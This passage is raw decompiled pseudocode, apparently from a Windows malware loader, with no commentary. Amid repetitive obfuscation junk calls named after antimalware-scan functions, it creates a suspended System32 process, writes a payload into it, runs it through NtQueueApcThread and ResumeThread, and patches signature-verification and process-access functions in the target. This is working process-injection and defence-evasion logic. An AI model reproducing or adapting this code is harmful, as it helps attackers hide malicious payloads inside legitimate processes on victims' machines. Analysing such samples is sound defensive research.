					E032A4698( &_v1376, E032A4964(_v1380));
					_pop(_t6079);
					E032B7C04(_v1376,  *0x33d28a8, _t6079, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1384, E032A4964(_v1388));
					_push(_v1384);
					E032A47B0( &_v1396,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1392, E032A4964(_v1396));
					_pop(_t6084);
					E032B7C04(_v1392,  *0x33d28a8, _t6084, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1400, E032A4964(_v1404));
					_push(_v1400);
					E032A47B0( &_v1412,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1408, E032A4964(_v1412));
					_pop(_t6089);
					E032B7C04(_v1408,  *0x33d28a8, _t6089, _t7118);
					_t6090 =  *0x32c9ae4; // 0x7b7194
					E032A4728( &_v1420, _t6090);
					E032BCD4C( *0x33d2830, 0x33d2880,  &_v1416, _v1420, _t7104, _t7105);
					_t5590 =  *0x32bca10; // 0x32bca14
					E032A57DC(0x33d2880, _t5590, _v1416);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("Initialize");
					E032A4824();
					E032A4698( &_v1424, E032A4964(_v1428));
					_push(_v1424);
					E032A47B0( &_v1436,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1432, E032A4964(_v1436));
					_pop(_t6097);
					E032B7C04(_v1432,  *0x33d28a8, _t6097, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v1440, E032A4964(_v1444));
					_push(_v1440);
					E032A47B0( &_v1452,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1448, E032A4964(_v1452));
					_pop(_t6102);
					E032B7C04(_v1448,  *0x33d28a8, _t6102, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1456, E032A4964(_v1460));
					_push(_v1456);
					E032A47B0( &_v1468,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1464, E032A4964(_v1468));
					_pop(_t6107);
					E032B7C04(_v1464,  *0x33d28a8, _t6107, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1472, E032A4964(_v1476));
					_push(_v1472);
					E032A47B0( &_v1484,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1480, E032A4964(_v1484));
					_pop(_t6112);
					E032B7C04(_v1480,  *0x33d28a8, _t6112, _t7118);
					E032A44F4(0x33d28d4,  *((intOrPtr*)( *0x33d2880 + 4)));
					E032A44F4(0x33d28cc,  *((intOrPtr*)( *0x33d2880 + 8)));
					E032A44F4(0x33d286c,  *((intOrPtr*)( *0x33d2880 + 0xc)));
					E032A44F4(0x33d28d0,  *((intOrPtr*)( *0x33d2880 + 0x10)));
					E032A44F4(0x33d28b8,  *((intOrPtr*)( *0x33d2880 + 0x14)));
					E032A44F4(0x33d28bc,  *((intOrPtr*)( *0x33d2880 + 0x18)));
					E032A44F4(0x33d28c0,  *((intOrPtr*)( *0x33d2880 + 0x1c)));
					E032A44F4(0x33d28c4,  *((intOrPtr*)( *0x33d2880 + 0x20)));
					E032A44F4(0x33d28b0,  *((intOrPtr*)( *0x33d2880 + 0x24)));
					E032A44F4(0x33d2824,  *((intOrPtr*)( *0x33d2880 + 0x28)));
					E032A44F4(0x33d2828,  *((intOrPtr*)( *0x33d2880 + 0x2c)));
					E032A44F4(0x33d282c,  *((intOrPtr*)( *0x33d2880 + 0x30)));
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1488, E032A4964(_v1492));
					_push(_v1488);
					E032A47B0( &_v1500,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1496, E032A4964(_v1500));
					_pop(_t6141);
					E032B7C04(_v1496,  *0x33d28a8, _t6141, _t7118);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v1504, E032A4964(_v1508));
					_push(_v1504);
					E032A47B0( &_v1516,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1512, E032A4964(_v1516));
					_pop(_t6146);
					E032B7C04(_v1512,  *0x33d28a8, _t6146, _t7118);
					E032A4698( &_v1520, E032A4964( *0x33d287c));
					_t2912 = E032A7E64(_v1520);
					_t7119 = _t2912;
					if(_t2912 == 0) {
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v1524, E032A4964(_v1528));
						_push(_v1524);
						E032A47B0( &_v1536,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v1532, E032A4964(_v1536));
						_pop(_t6897);
						E032B7C04(_v1532,  *0x33d28a8, _t6897, _t7119);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v1540, E032A4964(_v1544));
						_push(_v1540);
						E032A47B0( &_v1552,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v1548, E032A4964(_v1552));
						_pop(_t6902);
						E032B7C04(_v1548,  *0x33d28a8, _t6902, _t7119);
						E032A4698( &_v1556, E032A4964( *0x33d287c));
						E032A802C(_v1556);
					}
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1560, E032A4964(_v1564));
					_push(_v1560);
					E032A47B0( &_v1572,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1568, E032A4964(_v1572));
					_pop(_t6152);
					E032B7C04(_v1568,  *0x33d28a8, _t6152, _t7119);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1576, E032A4964(_v1580));
					_push(_v1576);
					E032A47B0( &_v1588,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1584, E032A4964(_v1588));
					_pop(_t6157);
					E032B7C04(_v1584,  *0x33d28a8, _t6157, _t7119);
					_v1112 =  *0x33d28cc;
					_t5539 = _v1112;
					if(_t5539 != 0) {
						_t5539 =  *(_t5539 - 4);
					}
					_t7122 = _t5539 - 3;
					E032A49C4( *0x33d28cc, _t5539 - 3, 1, 0x33d28cc);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1592, E032A4964(_v1596));
					_push(_v1592);
					E032A47B0( &_v1604,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1600, E032A4964(_v1604));
					_pop(_t6163);
					E032B7C04(_v1600,  *0x33d28a8, _t6163, _t7122);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanString");
					E032A4824();
					E032A4698( &_v1608, E032A4964(_v1612));
					_push(_v1608);
					E032A47B0( &_v1620,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1616, E032A4964(_v1620));
					_pop(_t6168);
					E032B7C04(_v1616,  *0x33d28a8, _t6168, _t7122);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("OpenSession");
					E032A4824();
					E032A4698( &_v1624, E032A4964(_v1628));
					_push(_v1624);
					E032A47B0( &_v1636,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1632, E032A4964(_v1636));
					_pop(_t6173);
					E032B7C04(_v1632,  *0x33d28a8, _t6173, _t7122);
					_push(0x32c6aa0);
					_push( *0x33d28a8);
					_push("ScanBuffer");
					E032A4824();
					E032A4698( &_v1640, E032A4964(_v1644));
					_push(_v1640);
					E032A47B0( &_v1652,  *0x33d28a8, 0x32c6aa0);
					E032A4698( &_v1648, E032A4964(_v1652));
					_pop(_t6178);
					E032B7C04(_v1648,  *0x33d28a8, _t6178, _t7122);
					E032A48B0( *0x33d28b8, 0x32c6d40);
					if(_t7122 != 0) {
						L28:
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v2204, E032A4964(_v2208));
						_push(_v2204);
						E032A47B0( &_v2216,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2212, E032A4964(_v2216));
						_pop(_t6184);
						E032B7C04(_v2212,  *0x33d28a8, _t6184, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v2220, E032A4964(_v2224));
						_push(_v2220);
						E032A47B0( &_v2232,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2228, E032A4964(_v2232));
						_pop(_t6189);
						E032B7C04(_v2228,  *0x33d28a8, _t6189, __eflags);
						E032BCE98( *0x33d286c, _t5539,  &_v2236,  *0x33d28d4, _t7104, _t7105);
						E032A44F4(0x33d281c, _v2236);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v2240, E032A4964(_v2244));
						_push(_v2240);
						E032A47B0( &_v2252,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2248, E032A4964(_v2252));
						_pop(_t6196);
						E032B7C04(_v2248,  *0x33d28a8, _t6196, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v2256, E032A4964(_v2260));
						_push(_v2256);
						E032A47B0( &_v2268,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2264, E032A4964(_v2268));
						_pop(_t6201);
						E032B7C04(_v2264,  *0x33d28a8, _t6201, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v2272, E032A4964(_v2276));
						_push(_v2272);
						E032A47B0( &_v2284,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2280, E032A4964(_v2284));
						_pop(_t6206);
						E032B7C04(_v2280,  *0x33d28a8, _t6206, __eflags);
						E032BD550( *0x33d281c, _t5539,  &_v2288, E032A7AB0( *0x33d28c4, __eflags), _t7105);
						E032A44F4(0x33d2818, _v2288);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v2292, E032A4964(_v2296));
						_push(_v2292);
						E032A47B0( &_v2304,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2300, E032A4964(_v2304));
						_pop(_t6213);
						E032B7C04(_v2300,  *0x33d28a8, _t6213, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v2308, E032A4964(_v2312));
						_push(_v2308);
						E032A47B0( &_v2320,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2316, E032A4964(_v2320));
						_pop(_t6218);
						E032B7C04(_v2316,  *0x33d28a8, _t6218, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanBuffer");
						E032A4824();
						E032A4698( &_v2324, E032A4964(_v2328));
						_push(_v2324);
						E032A47B0( &_v2336,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2332, E032A4964(_v2336));
						_pop(_t6223);
						E032B7C04(_v2332,  *0x33d28a8, _t6223, __eflags);
						E032B7CB0( *0x33d2818,  *0x33d28a8,  &_v2344);
						E032BD4EC(_v2344,  *0x33d28a8,  &_v2340);
						E032A44F4(0x33d2870, _v2340);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("Initialize");
						E032A4824();
						E032A4698( &_v2348, E032A4964(_v2352));
						_push(_v2348);
						E032A47B0( &_v2360,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2356, E032A4964(_v2360));
						_pop(_t6231);
						E032B7C04(_v2356,  *0x33d28a8, _t6231, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("OpenSession");
						E032A4824();
						E032A4698( &_v2364, E032A4964(_v2368));
						_push(_v2364);
						E032A47B0( &_v2376,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2372, E032A4964(_v2376));
						_pop(_t6236);
						E032B7C04(_v2372,  *0x33d28a8, _t6236, __eflags);
						_push(0x32c6aa0);
						_push( *0x33d28a8);
						_push("ScanString");
						E032A4824();
						E032A4698( &_v2380, E032A4964(_v2384));
						_push(_v2380);
						E032A47B0( &_v2392,  *0x33d28a8, 0x32c6aa0);
						E032A4698( &_v2388, E032A4964(_v2392));
						_pop(_t6241);
						E032B7C04(_v2388,  *0x33d28a8, _t6241, __eflags);
						E032A48B0( *0x33d28d0, 0x32c6d40);
						if(__eflags != 0) {
							L32:
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v3476, E032A4964(_v3480));
							_push(_v3476);
							E032A47B0( &_v3488,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v3484, E032A4964(_v3488));
							_pop(_t6247);
							E032B7C04(_v3484,  *0x33d28a8, _t6247, __eflags);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v3492, E032A4964(_v3496));
							_push(_v3492);
							E032A47B0( &_v3504,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v3500, E032A4964(_v3504));
							_pop(_t6252);
							E032B7C04(_v3500,  *0x33d28a8, _t6252, __eflags);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v3508, E032A4964(_v3512));
							_push(_v3508);
							E032A47B0( &_v3520,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v3516, E032A4964(_v3520));
							_pop(_t6257);
							E032B7C04(_v3516,  *0x33d28a8, _t6257, __eflags);
							E032A48B0( *0x33d28c0, 0x32c6d40);
							if(__eflags != 0) {
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v3820, E032A4964(_v3824));
								_push(_v3820);
								E032A47B0( &_v3832,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3828, E032A4964(_v3832));
								_pop(_t6263);
								E032B7C04(_v3828,  *0x33d28a8, _t6263, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v3836, E032A4964(_v3840));
								_push(_v3836);
								E032A47B0( &_v3848,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3844, E032A4964(_v3848));
								_pop(_t6268);
								E032B7C04(_v3844,  *0x33d28a8, _t6268, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3852, E032A4964(_v3856));
								_push(_v3852);
								E032A47B0( &_v3864,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3860, E032A4964(_v3864));
								_pop(_t6273);
								E032B7C04(_v3860,  *0x33d28a8, _t6273, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v3868, E032A4964(_v3872));
								_push(_v3868);
								E032A47B0( &_v3880,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3876, E032A4964(_v3880));
								_pop(_t6278);
								E032B7C04(_v3876,  *0x33d28a8, _t6278, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3884, E032A4964(_v3888));
								_push(_v3884);
								E032A47B0( &_v3896,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3892, E032A4964(_v3896));
								_pop(_t6283);
								E032B7C04(_v3892,  *0x33d28a8, _t6283, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v3900, E032A4964(_v3904));
								_push(_v3900);
								E032A47B0( &_v3912,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3908, E032A4964(_v3912));
								_pop(_t6288);
								E032B7C04(_v3908,  *0x33d28a8, _t6288, __eflags);
								E032A48B0( *0x33d28bc, 0x32c6d40);
								if(__eflags == 0) {
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("UacScan");
									E032A4824();
									E032A4698( &_v3916, E032A4964(_v3920));
									_push(_v3916);
									E032A47B0( &_v3928,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v3924, E032A4964(_v3928));
									_pop(_t6538);
									E032B7C04(_v3924,  *0x33d28a8, _t6538, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v3932, E032A4964(_v3936));
									_push(_v3932);
									E032A47B0( &_v3944,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v3940, E032A4964(_v3944));
									_pop(_t6543);
									E032B7C04(_v3940,  *0x33d28a8, _t6543, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanString");
									E032A4824();
									E032A4698( &_v3948, E032A4964(_v3952));
									_push(_v3948);
									E032A47B0( &_v3960,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v3956, E032A4964(_v3960));
									_pop(_t6548);
									E032B7C04(_v3956,  *0x33d28a8, _t6548, __eflags);
									E032A47B0( &_v3968,  *0x33d2820, "C:\\Windows\\System32\\");
									E032A4D38( &_v3964, E032A4964(_v3968));
									_t3979 = CreateProcessAsUserW( *0x33d2794, 0, E032A4DB4(_v3964), 0, 0, 0, 4, 0, 0, 0x33d2798, 0x33d27dc);
									__eflags = _t3979;
									if(_t3979 != 0) {
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("OpenSession");
										E032A4824();
										E032A4698( &_v3972, E032A4964(_v3976));
										_push(_v3972);
										E032A47B0( &_v3984,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v3980, E032A4964(_v3984));
										_pop(_t6620);
										E032B7C04(_v3980,  *0x33d28a8, _t6620, __eflags);
									}
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v3988, E032A4964(_v3992));
									_push(_v3988);
									E032A47B0( &_v4000,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v3996, E032A4964(_v4000));
									_pop(_t6555);
									E032B7C04(_v3996,  *0x33d28a8, _t6555, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("UacScan");
									E032A4824();
									E032A4698( &_v4004, E032A4964(_v4008));
									_push(_v4004);
									E032A47B0( &_v4016,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4012, E032A4964(_v4016));
									_pop(_t6560);
									E032B7C04(_v4012,  *0x33d28a8, _t6560, __eflags);
									_v1112 =  *0x33d2870;
									_t5539 = _v1112;
									__eflags = _t5539;
									if(_t5539 != 0) {
										_t5540 = _t5539 - 4;
										__eflags = _t5540;
										_t5539 =  *_t5540;
									}
									E032BCCC8(0x32de54c, _t5539, E032A49BC(0x33d2870));
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v4020, E032A4964(_v4024));
									_push(_v4020);
									E032A47B0( &_v4032,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4028, E032A4964(_v4032));
									_pop(_t6566);
									E032B7C04(_v4028,  *0x33d28a8, _t6566, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v4036, E032A4964(_v4040));
									_push(_v4036);
									E032A47B0( &_v4048,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4044, E032A4964(_v4048));
									_pop(_t6571);
									E032B7C04(_v4044,  *0x33d28a8, _t6571, __eflags);
									 *0x33d2868 = E032BC24C(0x33d27dc->hProcess, _t5539, 0x32de54c, _t7104, _t7105);
									__eflags =  *0x33d2868;
									if( *0x33d2868 != 0) {
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("OpenSession");
										E032A4824();
										E032A4698( &_v4052, E032A4964(_v4056));
										_push(_v4052);
										E032A47B0( &_v4064,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v4060, E032A4964(_v4064));
										_pop(_t6615);
										E032B7C04(_v4060,  *0x33d28a8, _t6615, __eflags);
									}
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("Initialize");
									E032A4824();
									E032A4698( &_v4068, E032A4964(_v4072));
									_push(_v4068);
									E032A47B0( &_v4080,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4076, E032A4964(_v4080));
									_pop(_t6577);
									E032B7C04(_v4076,  *0x33d28a8, _t6577, __eflags);
									NtQueueApcThread( *0x33d27e0,  *0x33d2868, 0, 0, 0);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("UacScan");
									E032A4824();
									E032A4698( &_v4084, E032A4964(_v4088));
									_push(_v4084);
									E032A47B0( &_v4096,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4092, E032A4964(_v4096));
									_pop(_t6582);
									E032B7C04(_v4092,  *0x33d28a8, _t6582, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("Initialize");
									E032A4824();
									E032A4698( &_v4100, E032A4964(_v4104));
									_push(_v4100);
									E032A47B0( &_v4112,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4108, E032A4964(_v4112));
									_pop(_t6587);
									E032B7C04(_v4108,  *0x33d28a8, _t6587, __eflags);
									ResumeThread( *0x33d27e0);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("UacScan");
									E032A4824();
									E032A4698( &_v4116, E032A4964(_v4120));
									_push(_v4116);
									E032A47B0( &_v4128,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4124, E032A4964(_v4128));
									_pop(_t6592);
									E032B7C04(_v4124,  *0x33d28a8, _t6592, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v4132, E032A4964(_v4136));
									_push(_v4132);
									E032A47B0( &_v4144,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4140, E032A4964(_v4144));
									_pop(_t6597);
									E032B7C04(_v4140,  *0x33d28a8, _t6597, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v4148, E032A4964(_v4152));
									_push(_v4148);
									E032A47B0( &_v4160,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4156, E032A4964(_v4160));
									_pop(_t6602);
									E032B7C04(_v4156,  *0x33d28a8, _t6602, __eflags);
									E032B7B14(0x33d27dc->hProcess, "BCryptVerifySignature");
									E032B7B14(0x33d27dc->hProcess, "BCryptQueryProviderRegistration");
									E032B7B14(0x33d27dc->hProcess, "BCryptRegisterProvider");
									E032B7B14(0x33d27dc->hProcess, "NtReadVirtualMemory");
									E032B7B14(0x33d27dc->hProcess, "NtOpenObjectAuditAlarm");
									E032B7B14(0x33d27dc->hProcess, "I_QueryTagInformation");
									E032B7B14(0x33d27dc->hProcess, "NtSetSecurityObject");
									E032B7B14(0x33d27dc->hProcess, "NtOpenProcess");
									CloseHandle( *0x33d27dc);
								}
								E032A48B0( *0x33d282c, 0x32c6d40);
								if(__eflags == 0) {
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v4164, E032A4964(_v4168));
									_push(_v4164);
									E032A47B0( &_v4176,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4172, E032A4964(_v4176));
									_pop(_t6468);
									E032B7C04(_v4172,  *0x33d28a8, _t6468, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanString");
									E032A4824();
									E032A4698( &_v4180, E032A4964(_v4184));
									_push(_v4180);
									E032A47B0( &_v4192,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4188, E032A4964(_v4192));
									_pop(_t6473);
									E032B7C04(_v4188,  *0x33d28a8, _t6473, __eflags);
									_push( *0x33d287c);
									_push(0x32c6d78);
									E032B7CB0( *0x33d28cc,  *0x33d28a8,  &_v4200);
									_push(_v4200);
									_push(0x32c7054);
									_push(0);
									_push(0x32c7060);
									_push(0);
									_push(0x32c706c);
									E032A4824();
									E032A4698(0x33d28b4, E032A4964(_v4196));
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanString");
									E032A4824();
									E032A4698( &_v4204, E032A4964(_v4208));
									_push(_v4204);
									E032A47B0( &_v4216,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4212, E032A4964(_v4216));
									_pop(_t6481);
									E032B7C04(_v4212,  *0x33d28a8, _t6481, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v4220, E032A4964(_v4224));
									_push(_v4220);
									E032A47B0( &_v4232,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4228, E032A4964(_v4232));
									_pop(_t6486);
									E032B7C04(_v4228,  *0x33d28a8, _t6486, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v4236, E032A4964(_v4240));
									_push(_v4236);
									E032A47B0( &_v4248,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4244, E032A4964(_v4248));
									_pop(_t6491);
									E032B7C04(_v4244,  *0x33d28a8, _t6491, __eflags);
									_t3812 = E032A7E40( *0x33d28b4);
									__eflags = _t3812;
									if(_t3812 == 0) {
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("UacScan");
										E032A4824();
										E032A4698( &_v4252, E032A4964(_v4256));
										_push(_v4252);
										E032A47B0( &_v4264,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v4260, E032A4964(_v4264));
										_pop(_t6512);
										E032B7C04(_v4260,  *0x33d28a8, _t6512, __eflags);
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("ScanBuffer");
										E032A4824();
										E032A4698( &_v4268, E032A4964(_v4272));
										_push(_v4268);
										E032A47B0( &_v4280,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v4276, E032A4964(_v4280));
										_pop(_t6517);
										E032B7C04(_v4276,  *0x33d28a8, _t6517, __eflags);
										E032BCE58(0x32c9d58,  &_v4284, 0x109ff);
										E032A44F4(0x33d2844, _v4284);
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("UacScan");
										E032A4824();
										E032A4698( &_v4288, E032A4964(_v4292));
										_push(_v4288);
										E032A47B0( &_v4300,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v4296, E032A4964(_v4300));
										_pop(_t6524);
										E032B7C04(_v4296,  *0x33d28a8, _t6524, __eflags);
										_push(0x32c6aa0);
										_push( *0x33d28a8);
										_push("ScanString");
										E032A4824();
										E032A4698( &_v4304, E032A4964(_v4308));
										_push(_v4304);
										E032A47B0( &_v4316,  *0x33d28a8, 0x32c6aa0);
										E032A4698( &_v4312, E032A4964(_v4316));
										_pop(_t6529);
										E032B7C04(_v4312,  *0x33d28a8, _t6529, __eflags);
										E032A4DA4( &_v4320,  *0x33d28b4);
										_push(_v4320);
										E032A4DA4( &_v4328,  *0x33d2844);
										E032A4728( &_v4324, _v4328);
										_pop(_t6533);
										E032BCB04(_v4324, _t5539, _t6533, _t7105);
									}
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("Initialize");
									E032A4824();
									E032A4698( &_v4332, E032A4964(_v4336));
									_push(_v4332);
									E032A47B0( &_v4344,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4340, E032A4964(_v4344));
									_pop(_t6496);
									E032B7C04(_v4340,  *0x33d28a8, _t6496, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v4348, E032A4964(_v4352));
									_push(_v4348);
									E032A47B0( &_v4360,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4356, E032A4964(_v4360));
									_pop(_t6501);
									E032B7C04(_v4356,  *0x33d28a8, _t6501, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v4364, E032A4964(_v4368));
									_push(_v4364);
									E032A47B0( &_v4376,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v4372, E032A4964(_v4376));
									_pop(_t6506);
									E032B7C04(_v4372,  *0x33d28a8, _t6506, __eflags);
									E032B7F54( *0x33d28b4, _t5539, E032A49BC(0x33d2870), _t7104, _t7105, _t7125);
								}
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v4380, E032A4964(_v4384));
								_push(_v4380);
								E032A47B0( &_v4392,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4388, E032A4964(_v4392));
								_pop(_t6295);
								E032B7C04(_v4388,  *0x33d28a8, _t6295, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v4396, E032A4964(_v4400));
								_push(_v4396);
								E032A47B0( &_v4408,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4404, E032A4964(_v4408));
								_pop(_t6300);
								E032B7C04(_v4404,  *0x33d28a8, _t6300, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v4412, E032A4964(_v4416));
								_push(_v4412);
								E032A47B0( &_v4424,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4420, E032A4964(_v4424));
								_pop(_t6305);
								E032B7C04(_v4420,  *0x33d28a8, _t6305, __eflags);
								E032A4698( &_v4428, "BCryptVerifySignature");
